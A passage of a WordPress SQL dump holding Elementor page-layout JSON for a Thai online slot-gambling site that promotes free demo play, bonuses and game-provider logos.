t\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2910,392,'_thumbnail_id','354'),(2914,393,'_elementor_edit_mode','builder'),(2915,393,'_elementor_template_type','wp-page'),(2916,393,'_elementor_version','3.35.5'),(2917,393,'_elementor_pro_version','3.32.3'),(2918,393,'_wp_page_template','default'),(2919,393,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2920,393,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\",\"id\":354,\"size\":\"\",\"alt\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2921,393,'_thumbnail_id','354'),(2927,394,'_elementor_edit_mode','builder'),(2928,394,'_elementor_template_type','wp-page'),(2929,394,'_elementor_version','3.35.5'),(2930,394,'_elementor_pro_version','3.32.3'),(2931,394,'_wp_page_template','default'),(2932,394,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}');
INSERT INTO `IwGJ28BV_postmeta` VALUES (2933,394,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\",\"id\":354,\"size\":\"\",\"alt\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA 